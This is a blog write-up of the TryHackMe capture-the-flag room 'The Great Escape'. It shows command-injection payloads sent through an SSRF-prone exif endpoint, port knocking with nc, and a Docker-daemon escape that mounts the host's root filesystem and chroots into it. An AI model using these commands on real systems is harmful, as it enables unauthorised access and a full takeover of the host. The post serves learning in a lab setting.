<!DOCTYPE html>
<html lang="en">
  <head>
    <title>
  The Great Escape · takov751
</title>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="color-scheme" content="light dark">




<meta name="author" content="takov751">
<meta name="description" content="We have a gallery node.js app with some interesting api endpoints specially the /api/exif. The box itself was hard to fuzz as it was really unstable. After 4 hours poking around i found that /api/exif?url= is not vulnarable to code injection and ssrf attack seemed futile as well until reading the hint x1000 times i just checked /.well-known/security.txt which gave me an interesting answer
first flag
Hey you found me! The security.">
<meta name="keywords" content="blog,personal">

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="The Great Escape"/>
<meta name="twitter:description" content="We have a gallery node.js app with some interesting api endpoints specially the /api/exif. The box itself was hard to fuzz as it was really unstable. After 4 hours poking around i found that /api/exif?url= is not vulnarable to code injection and ssrf attack seemed futile as well until reading the hint x1000 times i just checked /.well-known/security.txt which gave me an interesting answer
first flag
Hey you found me! The security."/>

<meta property="og:title" content="The Great Escape" />
<meta property="og:description" content="We have a gallery node.js app with some interesting api endpoints specially the /api/exif. The box itself was hard to fuzz as it was really unstable. After 4 hours poking around i found that /api/exif?url= is not vulnarable to code injection and ssrf attack seemed futile as well until reading the hint x1000 times i just checked /.well-known/security.txt which gave me an interesting answer
first flag
Hey you found me! The security." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://takov751.gitlab.io/posts/great_escape/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-02-21T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-02-21T00:00:00+00:00" />





<link rel="canonical" href="https://takov751.gitlab.io/posts/great_escape/">


<link rel="preload" href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>


  
  
  <link rel="stylesheet" href="/css/coder.min.c4d7e93a158eda5a65b3df343745d2092a0a1e2170feeec909b8a89443903c6a.css" integrity="sha256-xNfpOhWO2lpls980N0XSCSoKHiFw/u7JCbiolEOQPGo=" crossorigin="anonymous" media="screen" />






  
    
    
    <link rel="stylesheet" href="/css/coder-dark.min.78b5fe3864945faf5207fb8fe3ab2320d49c3365def0e88ac1df0ddadc54a03c.css" integrity="sha256-eLX&#43;OGSUX69SB/uP46sjINScM2Xe8OiKwd8N2txUoDw=" crossorigin="anonymous" media="screen" />
  



 




<link rel="icon" type="image/png" href="/images/favicon32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16">

<link rel="apple-touch-icon" href="/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/images/safari-pinned-tab.svg" color="#5bbad5">




<meta name="generator" content="Hugo 0.105.0">





  </head>






<body class="preload-transitions colorscheme-dark">
  
<div class="float-container">
    <a id="dark-mode-toggle" class="colorscheme-toggle">
        <i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
    </a>
</div>


  <main class="wrapper">
    <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="/">
      takov751
    </a>
    
      <input type="checkbox" id="menu-toggle" />
      <label class="menu-button float-right" for="menu-toggle">
        <i class="fa fa-bars fa-fw" aria-hidden="true"></i>
      </label>
      <ul class="navigation-list">
        
          
            <li class="navigation-item">
              <a class="navigation-link" href="/about/">About</a>
            </li>
          
            <li class="navigation-item">
              <a class="navigation-link" href="/posts/">Blog</a>
            </li>
          
            <li class="navigation-item">
              <a class="navigation-link" href="/contact/">Contact me</a>
            </li>
          
        
        
      </ul>
    
  </section>
</nav>


    <div class="content">
      
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">
            <a class="title-link" href="https://takov751.gitlab.io/posts/great_escape/">
              The Great Escape
            </a>
          </h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fa fa-calendar" aria-hidden="true"></i>
              <time datetime="2021-02-21T00:00:00Z">
                February 21, 2021
              </time>
            </span>
            <span class="reading-time">
              <i class="fa fa-clock-o" aria-hidden="true"></i>
              8-minute read
            </span>
          </div>
          
          
          <div class="tags">
  <i class="fa fa-tag" aria-hidden="true"></i>
    <span class="tag">
      <a href="/tags/tryhackme/">tryhackme</a>
    </span>
      <span class="separator">•</span>
    <span class="tag">
      <a href="/tags/ctf/">ctf</a>
    </span></div>

        </div>
      </header>

      <div>
        
        <p>We have a gallery node.js app with some interesting api endpoints specially the /api/exif. The box itself was hard to fuzz as it was really unstable. After 4 hours poking around i found that /api/exif?url= is not vulnarable to code injection and ssrf attack seemed futile as well until reading the hint x1000 times i just checked <code>/.well-known/security.txt</code> which gave me an interesting answer</p>
<p>first flag</p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>Hey you found me!
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>See https://securitytxt.org/ for more information.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Ping /api/fl46 with a HEAD request for a nifty treat.
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>curl --head http://10.10.169.244/api/fl46
</span></span><span style="display:flex;"><span>HTTP/1.1 200 OK
</span></span><span style="display:flex;"><span>Server: nginx/1.19.6
</span></span><span style="display:flex;"><span>Date: Thu, 18 Feb 2021 12:50:47 GMT
</span></span><span style="display:flex;"><span>Connection: keep-alive
</span></span><span style="display:flex;"><span>flag: THM{REDACTED}
</span></span></code></pre></div><p>After that poking and enumeration around gave us some interesting stuff with the robots.txt,but it was bit confusing until someone told me use the filename and endpoints as reference to enumerate the *.bak.txt file name which gave me finnaly</p>
<p><code>http://10.10.183.199/exif-util.bak.txt</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>&lt;template&gt;
</span></span><span style="display:flex;"><span>  &lt;section&gt;
</span></span><span style="display:flex;"><span>    &lt;div class=&#34;container&#34;&gt;
</span></span><span style="display:flex;"><span>      &lt;h1 class=&#34;title&#34;&gt;Exif Utils&lt;/h1&gt;
</span></span><span style="display:flex;"><span>      &lt;section&gt;
</span></span><span style="display:flex;"><span>        &lt;form @submit.prevent=&#34;submitUrl&#34; name=&#34;submitUrl&#34;&gt;
</span></span><span style="display:flex;"><span>          &lt;b-field grouped label=&#34;Enter a URL to an image&#34;&gt;
</span></span><span style="display:flex;"><span>            &lt;b-input
</span></span><span style="display:flex;"><span>              placeholder=&#34;http://...&#34;
</span></span><span style="display:flex;"><span>              expanded
</span></span><span style="display:flex;"><span>              v-model=&#34;url&#34;
</span></span><span style="display:flex;"><span>            &gt;&lt;/b-input&gt;
</span></span><span style="display:flex;"><span>            &lt;b-button native-type=&#34;submit&#34; type=&#34;is-dark&#34;&gt;
</span></span><span style="display:flex;"><span>              Submit
</span></span><span style="display:flex;"><span>            &lt;/b-button&gt;
</span></span><span style="display:flex;"><span>          &lt;/b-field&gt;
</span></span><span style="display:flex;"><span>        &lt;/form&gt;
</span></span><span style="display:flex;"><span>      &lt;/section&gt;
</span></span><span style="display:flex;"><span>      &lt;section v-if=&#34;hasResponse&#34;&gt;
</span></span><span style="display:flex;"><span>        &lt;pre&gt;
</span></span><span style="display:flex;"><span>          {{ response }}
</span></span><span style="display:flex;"><span>        &lt;/pre&gt;
</span></span><span style="display:flex;"><span>      &lt;/section&gt;
</span></span><span style="display:flex;"><span>    &lt;/div&gt;
</span></span><span style="display:flex;"><span>  &lt;/section&gt;
</span></span><span style="display:flex;"><span>&lt;/template&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;script&gt;
</span></span><span style="display:flex;"><span>export default {
</span></span><span style="display:flex;"><span>  name: &#39;Exif Util&#39;,
</span></span><span style="display:flex;"><span>  auth: false,
</span></span><span style="display:flex;"><span>  data() {
</span></span><span style="display:flex;"><span>    return {
</span></span><span style="display:flex;"><span>      hasResponse: false,
</span></span><span style="display:flex;"><span>      response: &#39;&#39;,
</span></span><span style="display:flex;"><span>      url: &#39;&#39;,
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>  methods: {
</span></span><span style="display:flex;"><span>    async submitUrl() {
</span></span><span style="display:flex;"><span>      this.hasResponse = false
</span></span><span style="display:flex;"><span>      console.log(&#39;Submitted URL&#39;)
</span></span><span style="display:flex;"><span>      try {
</span></span><span style="display:flex;"><span>        const response = await this.$axios.$get(&#39;http://api-dev-backup:8080/exif&#39;, {
</span></span><span style="display:flex;"><span>          params: {
</span></span><span style="display:flex;"><span>            url: this.url,
</span></span><span style="display:flex;"><span>          },
</span></span><span style="display:flex;"><span>        })
</span></span><span style="display:flex;"><span>        this.hasResponse = true
</span></span><span style="display:flex;"><span>        this.response = response
</span></span><span style="display:flex;"><span>      } catch (err) {
</span></span><span style="display:flex;"><span>        console.log(err)
</span></span><span style="display:flex;"><span>        this.$buefy.notification.open({
</span></span><span style="display:flex;"><span>          duration: 4000,
</span></span><span style="display:flex;"><span>          message: &#39;Something bad happened, please verify that the URL is valid&#39;,
</span></span><span style="display:flex;"><span>          type: &#39;is-danger&#39;,
</span></span><span style="display:flex;"><span>          position: &#39;is-top&#39;,
</span></span><span style="display:flex;"><span>          hasIcon: true,
</span></span><span style="display:flex;"><span>        })
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>&lt;/script&gt;
</span></span></code></pre></div><p>Where we can see that the exif-utils has a backup api dev inside which means ,one of the possible soulution to use a ssrf attack on exif-util and after a while i found some interesting thing that the backup exif tool was vulnarable to command injection,which gave us a perfect foothold to poke around on the filesystem.
Some interesting files I found on the way:</p>
<p>payload:
<code>http://api-dev-backup:8080/exif?url=;cat%20%2froot%2fdev-note.txt</code></p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>Hey guys,
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I&#39;ve deleted the stuff.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Anyways, the password is fluffybunnies123
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Cheers,
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Hydra
</span></span></code></pre></div><p>Interesting,but not much helpfull ,but in the root directory there are interesting files.</p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>        An error occurred: File format could not be determined
</span></span><span style="display:flex;"><span>                Retrieved Content
</span></span><span style="display:flex;"><span>                ----------------------------------------
</span></span><span style="display:flex;"><span>                An error occurred: File format could not be determined
</span></span><span style="display:flex;"><span>               Retrieved Content
</span></span><span style="display:flex;"><span>               ----------------------------------------
</span></span><span style="display:flex;"><span>               curl: no URL specified!
</span></span><span style="display:flex;"><span>curl: try &#39;curl --help&#39; or &#39;curl --manual&#39; for more information
</span></span><span style="display:flex;"><span>[user]
</span></span><span style="display:flex;"><span>	email = hydragyrum@example.com
</span></span><span style="display:flex;"><span>	name = Hydra
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>drwx------ 1 root root 4096 Jan  7 16:48 .
</span></span><span style="display:flex;"><span>drwxr-xr-x 1 root root 4096 Jan  7 22:14 ..
</span></span><span style="display:flex;"><span>lrwxrwxrwx 1 root root    9 Jan  6 20:51 .bash_history -&gt; /dev/null
</span></span><span style="display:flex;"><span>-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
</span></span><span style="display:flex;"><span>drwxr-xr-x 1 root root 4096 Jan  7 16:48 .git
</span></span><span style="display:flex;"><span>-rw-r--r-- 1 root root   53 Jan  6 20:51 .gitconfig
</span></span><span style="display:flex;"><span>-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
</span></span><span style="display:flex;"><span>-rw-rw-r-- 1 root root  201 Jan  7 16:46 dev-note.txt
</span></span></code></pre></div><p>There is a git repo. Lets see what happened in there</p>
<p><code>http://api-dev-backup:8080/exif?url=;cd%20%2froot%20%26%26%20git%20log%20-p</code></p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
</span></span><span style="display:flex;"><span>Author: Hydra &lt;hydragyrum@example.com&gt;
</span></span><span style="display:flex;"><span>Date:   Thu Jan 7 16:48:58 2021 +0000
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    fixed the dev note
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>diff --git a/dev-note.txt b/dev-note.txt
</span></span><span style="display:flex;"><span>new file mode 100644
</span></span><span style="display:flex;"><span>index 0000000..efadf5b
</span></span><span style="display:flex;"><span>--- /dev/null
</span></span><span style="display:flex;"><span>+++ b/dev-note.txt
</span></span><span style="display:flex;"><span>@@ -0,0 +1,9 @@
</span></span><span style="display:flex;"><span>+Hey guys,
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I&#39;ve deleted the stuff.
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Anyways, the password is fluffybunnies123
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Cheers,
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Hydra
</span></span><span style="display:flex;"><span>\ No newline at end of file
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
</span></span><span style="display:flex;"><span>Author: Hydra &lt;hydragyrum@example.com&gt;
</span></span><span style="display:flex;"><span>Date:   Wed Jan 6 20:51:39 2021 +0000
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    Removed the flag and original dev note b/c Security
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>diff --git a/dev-note.txt b/dev-note.txt
</span></span><span style="display:flex;"><span>deleted file mode 100644
</span></span><span style="display:flex;"><span>index 89dcd01..0000000
</span></span><span style="display:flex;"><span>--- a/dev-note.txt
</span></span><span style="display:flex;"><span>+++ /dev/null
</span></span><span style="display:flex;"><span>@@ -1,9 +0,0 @@
</span></span><span style="display:flex;"><span>-Hey guys,
</span></span><span style="display:flex;"><span>-
</span></span><span style="display:flex;"><span>-I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.
</span></span><span style="display:flex;"><span>-
</span></span><span style="display:flex;"><span>-Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.
</span></span><span style="display:flex;"><span>-
</span></span><span style="display:flex;"><span>-Cheers,
</span></span><span style="display:flex;"><span>-
</span></span><span style="display:flex;"><span>-Hydra
</span></span><span style="display:flex;"><span>\ No newline at end of file
</span></span><span style="display:flex;"><span>diff --git a/flag.txt b/flag.txt
</span></span><span style="display:flex;"><span>deleted file mode 100644
</span></span><span style="display:flex;"><span>index aae8129..0000000
</span></span><span style="display:flex;"><span>--- a/flag.txt
</span></span><span style="display:flex;"><span>+++ /dev/null
</span></span><span style="display:flex;"><span>@@ -1,3 +0,0 @@
</span></span><span style="display:flex;"><span>-You found the root flag, or did you?
</span></span><span style="display:flex;"><span>-
</span></span><span style="display:flex;"><span>-THM{REDACTED}
</span></span><span style="display:flex;"><span>\ No newline at end of file
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
</span></span><span style="display:flex;"><span>Author: Hydra &lt;hydragyrum@example.com&gt;
</span></span><span style="display:flex;"><span>Date:   Wed Jan 6 20:51:39 2021 +0000
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    Added the flag and dev notes
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>diff --git a/dev-note.txt b/dev-note.txt
</span></span><span style="display:flex;"><span>new file mode 100644
</span></span><span style="display:flex;"><span>index 0000000..89dcd01
</span></span><span style="display:flex;"><span>--- /dev/null
</span></span><span style="display:flex;"><span>+++ b/dev-note.txt
</span></span><span style="display:flex;"><span>@@ -0,0 +1,9 @@
</span></span><span style="display:flex;"><span>+Hey guys,
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Cheers,
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+Hydra
</span></span><span style="display:flex;"><span>\ No newline at end of file
</span></span><span style="display:flex;"><span>diff --git a/flag.txt b/flag.txt
</span></span><span style="display:flex;"><span>new file mode 100644
</span></span><span style="display:flex;"><span>index 0000000..aae8129
</span></span><span style="display:flex;"><span>--- /dev/null
</span></span><span style="display:flex;"><span>+++ b/flag.txt
</span></span><span style="display:flex;"><span>@@ -0,0 +1,3 @@
</span></span><span style="display:flex;"><span>+You found the root flag, or did you?
</span></span><span style="display:flex;"><span>+
</span></span><span style="display:flex;"><span>+THM{REDACTED}
</span></span><span style="display:flex;"><span>\ No newline at end of file
</span></span></code></pre></div><p>Soo this mean we have a docker daemon port exposure ,because of our &ldquo;lazy&rdquo; sysadmin.</p>
<p>Easiest Port knocking script:
<code>nc -z 10.10.169.244 42 1337 10420 6969 63000</code></p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>nmap 10.10.169.244 -p 2375
</span></span><span style="display:flex;"><span>Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 12:55 UTC
</span></span><span style="display:flex;"><span>Nmap scan report for 10.10.169.244
</span></span><span style="display:flex;"><span>Host is up (0.27s latency).
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PORT     STATE SERVICE
</span></span><span style="display:flex;"><span>2375/tcp open  docker
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
</span></span></code></pre></div><p>BOI gaze upon ,we have a way to communicate with that so we need the docker-cli package</p>
<p>Settings up our environment
<code>kali@kalinka:~$ export DOCKER_HOST=&quot;tcp://10.10.63.196:2375&quot;</code></p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>kali@kalinka:~$ docker ps
</span></span><span style="display:flex;"><span>CONTAINER ID   IMAGE          COMMAND                  CREATED       STATUS          PORTS                  NAMES
</span></span><span style="display:flex;"><span>49fe455a9681   frontend       &#34;/docker-entrypoint.…&#34;   5 weeks ago   Up 25 minutes   0.0.0.0:80-&gt;80/tcp     dockerescapecompose_frontend_1
</span></span><span style="display:flex;"><span>4b51f5742aad   exif-api-dev   &#34;./application -Dqua…&#34;   5 weeks ago   Up 25 minutes                          dockerescapecompose_api-dev-backup_1
</span></span><span style="display:flex;"><span>cb83912607b9   exif-api       &#34;./application -Dqua…&#34;   5 weeks ago   Up 25 minutes   8080/tcp               dockerescapecompose_api_1
</span></span><span style="display:flex;"><span>548b701caa56   endlessh       &#34;/endlessh -v&#34;           5 weeks ago   Up 25 minutes   0.0.0.0:22-&gt;2222/tcp   dockerescapecompose_endlessh_1
</span></span><span style="display:flex;"><span>kali@kalinka:~$ docker ps
</span></span><span style="display:flex;"><span>CONTAINER ID   IMAGE          COMMAND                  CREATED       STATUS          PORTS                  NAMES
</span></span><span style="display:flex;"><span>49fe455a9681   frontend       &#34;/docker-entrypoint.…&#34;   5 weeks ago   Up 25 minutes   0.0.0.0:80-&gt;80/tcp     dockerescapecompose_frontend_1
</span></span><span style="display:flex;"><span>4b51f5742aad   exif-api-dev   &#34;./application -Dqua…&#34;   5 weeks ago   Up 25 minutes                          dockerescapecompose_api-dev-backup_1
</span></span><span style="display:flex;"><span>cb83912607b9   exif-api       &#34;./application -Dqua…&#34;   5 weeks ago   Up 25 minutes   8080/tcp               dockerescapecompose_api_1
</span></span><span style="display:flex;"><span>548b701caa56   endlessh       &#34;/endlessh -v&#34;           5 weeks ago   Up 25 minutes   0.0.0.0:22-&gt;2222/tcp   dockerescapecompose_endlessh_1
</span></span><span style="display:flex;"><span>kali@kalinka:~$ docker ps
</span></span><span style="display:flex;"><span>CONTAINER ID   IMAGE          COMMAND                  CREATED       STATUS          PORTS                  NAMES
</span></span><span style="display:flex;"><span>49fe455a9681   frontend       &#34;/docker-entrypoint.…&#34;   5 weeks ago   Up 27 minutes   0.0.0.0:80-&gt;80/tcp     dockerescapecompose_frontend_1
</span></span><span style="display:flex;"><span>4b51f5742aad   exif-api-dev   &#34;./application -Dqua…&#34;   5 weeks ago   Up 27 minutes                          dockerescapecompose_api-dev-backup_1
</span></span><span style="display:flex;"><span>cb83912607b9   exif-api       &#34;./application -Dqua…&#34;   5 weeks ago   Up 27 minutes   8080/tcp               dockerescapecompose_api_1
</span></span><span style="display:flex;"><span>548b701caa56   endlessh       &#34;/endlessh -v&#34;           5 weeks ago   Up 27 minutes   0.0.0.0:22-&gt;2222/tcp   dockerescapecompose_endlessh_1
</span></span><span style="display:flex;"><span>kali@kalinka:~$ docker images
</span></span><span style="display:flex;"><span>REPOSITORY                                    TAG       IMAGE ID       CREATED         SIZE
</span></span><span style="display:flex;"><span>exif-api-dev                                  latest    4084cb55e1c7   5 weeks ago     214MB
</span></span><span style="display:flex;"><span>exif-api                                      latest    923c5821b907   5 weeks ago     163MB
</span></span><span style="display:flex;"><span>frontend                                      latest    577f9da1362e   5 weeks ago     138MB
</span></span><span style="display:flex;"><span>endlessh                                      latest    7bde5182dc5e   6 weeks ago     5.67MB
</span></span><span style="display:flex;"><span>nginx                                         latest    ae2feff98a0c   2 months ago    133MB
</span></span><span style="display:flex;"><span>debian                                        10-slim   4a9cd57610d6   2 months ago    69.2MB
</span></span><span style="display:flex;"><span>registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   2 months ago    103MB
</span></span><span style="display:flex;"><span>alpine                                        3.9       78a2ce922f86   10 months ago   5.55MB
</span></span></code></pre></div><p>Interesting we have a few base image installed as well, lets see if we can mount host machine root partition</p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>kali@kalinka:~$ docker run -ti alpine -v /:/mnt
</span></span><span style="display:flex;"><span>Unable to find image &#39;alpine:latest&#39; locally
</span></span></code></pre></div><p>Silly me there is no latest available so lets see what version we have</p>
<div class="highlight"><pre tabindex="0" style="color:#e5e5e5;background-color:#000;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>kali@kalinka:~$ docker images alpine
</span></span><span style="display:flex;"><span>REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
</span></span><span style="display:flex;"><span>alpine       3.9       78a2ce922f86   10 months ago   5.55MB
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>kali@kalinka:~$ docker run -ti -v /:/mnt 78a2ce922f86 sh
</span></span><span style="display:flex;"><span>/ # chroot /mnt
</span></span><span style="display:flex;"><span>groups: cannot find name for group ID 11
</span></span><span style="display:flex;"><span>To run a command as administrator (user &#34;root&#34;), use &#34;sudo &lt;command&gt;&#34;.
</span></span><span style="display:flex;"><span>See &#34;man sudo_root&#34; for details.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>root@a73060055db9:/# ls
</span></span><span style="display:flex;"><span>bin   home            lib64       opt   sbin      tmp      vmlinuz.old
</span></span><span style="display:flex;"><span>boot  initrd.img      lost+found  proc  srv       usr
</span></span><span style="display:flex;"><span>dev   initrd.img.old  media       root  swapfile  var
</span></span><span style="display:flex;"><span>etc   lib             mnt         run   sys       vmlinuz
</span></span><span style="display:flex;"><span>root@a73060055db9:/# ls -la
</span></span><span style="display:flex;"><span>total 239784
</span></span><span style="display:flex;"><span>drwxr-xr-x 22 root root      4096 Jan  9 22:11 .
</span></span><span style="display:flex;"><span>drwxr-xr-x 22 root root      4096 Jan  9 22:11 ..
</span></span><span style="display:flex;"><span>drwxr-xr-x  2 root root      4096 Jan  6 23:49 bin
</span></span><span style="display:flex;"><span>drwxr-xr-x  3 root root      4096 Jan  9 22:52 boot
</span></span><span style="display:flex;"><span>drwxr-xr-x 17 root root      3680 Feb 18 14:39 dev
</span></span><span style="display:flex;"><span>drwxr-xr-x 82 root root      4096 Feb 18 10:08 etc
</span></span><span style="display:flex;"><span>drwxr-xr-x  3 root root      4096 Jul 22  2020 home
</span></span><span style="display:flex;"><span>lrwxrwxrwx  1 root root        34 Jan  9 22:11 initrd.img -&gt; boot/initrd.img-4.15.0-130-generic
</span></span><span style="display:flex;"><span>lrwxrwxrwx  1 root root        34 Jan  9 22:11 initrd.img.old -&gt; boot/initrd.img-4.15.0-129-generic
</span></span><span style="display:flex;"><span>drwxr-xr-x 18 root root      4096 Jan  6 22:40 lib
</span></span><span style="display:flex;"><span>drwxr-xr-x  2 root root      4096 Jan  6 17:52 lib64
</span></span><span style="display:flex;"><span>drwx------  2 root root     16384 Jul 22  2020 lost+found
</span></span><span style="display:flex;"><span>drwxr-xr-x  2 root root      4096 Jul 22  2020 media
</span></span><span style="display:flex;"><span>drwxr-xr-x  2 root root      4096 Jul 22  2020 mnt
</span></span><span style="display:flex;"><span>drwxr-xr-x  3 root root      4096 Jan  6 19:06 opt
</span></span><span style="display:flex;"><span>dr-xr-xr-x 96 root root         0 Feb 18 14:39 proc
</span></span><span style="display:flex;"><span>drwx------  3 root root      4096 Jan  6 23:37 root
</span></span><span style="display:flex;"><span>drwxr-xr-x 19 root root       580 Feb 18 14:40 run
</span></span><span style="display:flex;"><span>drwxr-xr-x  2 root root      4096 Jan  6 23:49 sbin
</span></span><span style="display:flex;"><span>drwxr-xr-x  2 root root      4096 Jul 22  2020 srv
</span></span><span style="display:flex;"><span>-rw-------  1 root root 245452800 Jul 22  2020 swapfile
</span></span><span style="display:flex;"><span>dr-xr-xr-x 13 root root         0 Feb 18 14:39 sys
</span></span><span style="display:flex;"><span>drwxrwxrwt  9 root root      4096 Feb 18 15:13 tmp
</span></span><span style="display:flex;"><span>drwxr-xr-x 11 root root      4096 Jan  6 19:05 usr
</span></span><span style="display:flex;"><span>drwxr-xr-x 11 root root      4096 Jul 22  2020 var
</span></span><span style="display:flex;"><span>lrwxrwxrwx  1 root root        31 Jan  9 22:11 vmlinuz -&gt; boot/vmlinuz-4.15.0-130-generic
</span></span><span style="display:flex;"><span>lrwxrwxrwx  1 root root        31 Jan  9 22:11 vmlinuz.old -&gt; boot/vmlinuz-4.15.0-129-generic
</span></span><span style="display:flex;"><span>root@a73060055db9:/# cd root
</span></span><span style="display:flex;"><span>root@a73060055db9:~# ls
</span></span><span style="display:flex;"><span>flag.txt
</span></span><span style="display:flex;"><span>root@a73060055db9:~# cat flag.txt 
</span></span><span style="display:flex;"><span>Congrats, you found the real flag!
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>THM{REDACTED}
</span></span></code></pre></div><p>So we finished this box. This was a really interesting box, the foothold was a real pain in the bacon ,because it was a bit guessy for my taste. However after we found the command injection through a ssrf attack it was a real treat. And the bit greybeard portknocking part was amusing for sure. At the end the docker part was the easiest part in my opinion ,because I have to docker daily bases as I am a self-hosting a few services myself.</p>

      </div>


      <footer>
        


        
        
        
      </footer>
    </article>

    
  </section>

    </div>

    <footer class="footer">
  <section class="container">
    ©
    
      2021 -
    
    2022
     takov751 
    ·
    
    Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
    
  </section>
</footer>

  </main>

  

  
  
  <script src="/js/coder.min.236049395dc3682fb2719640872958e12f1f24067bb09c327b233e6290c7edac.js" integrity="sha256-I2BJOV3DaC&#43;ycZZAhylY4S8fJAZ7sJwyeyM&#43;YpDH7aw="></script>
  

  

  

  

  

  

  

  

  

  
</body>

</html>
